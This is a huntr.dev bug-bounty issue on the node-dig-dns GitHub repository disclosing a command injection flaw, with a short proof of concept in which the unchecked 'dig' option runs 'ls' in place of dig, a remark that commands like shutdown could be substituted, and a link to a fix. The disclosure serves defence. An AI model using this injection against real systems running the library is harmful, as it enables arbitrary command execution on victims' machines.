StephanGeorg / node-dig-dns

Use dig command (domain information grope) for DNS queries in node
MIT License

huntr.dev - Command Injection - (CWE-77) #6

Open huntr-helper opened 4 years ago

huntr-helper commented 4 years ago

This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)

Vulnerability Description

I would like to report an RCE issue in the node-dig-dns module. It allows the execution of arbitrary commands remotely on the victim's PC.

The issue occurs because user input is formatted into a command that is then executed without any check. The issue arises here: https://github.com/StephanGeorg/node-dig-dns/blob/master/src/index.js#L6

Steps To Reproduce:

  1. Create the following PoC file:

```js
// poc.js
var dig = require('node-dig-dns');

// The value of the `dig` option is placed into the command string
// unchecked, so it can be replaced with any other command (here `ls`).
// No dig arguments are passed at all.
dig([], { 'dig': 'ls' })
  .then((result) => {
    console.log(result); // prints the output of `ls`, not a DNS answer
  })
  .catch((err) => {
    console.log('Error:', err);
  });
```

  2. Execute the following commands in another terminal:

```sh
npm i node-dig-dns # Install affected module
node poc.js        # Run the PoC
```

  3. The output will show you the result of the ls command.

Please note that the vulnerability occurs only with a single command, making the commands to be executed more difficult and a little impactful. Anyway, Linux is a complex ecosystem, where commands like shutdown can be used in any way to make the PoC work a bit better.

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

JamieSlome commented 4 years ago

Please see https://github.com/StephanGeorg/node-dig-dns/pull/7 for a suggested fix! 🍰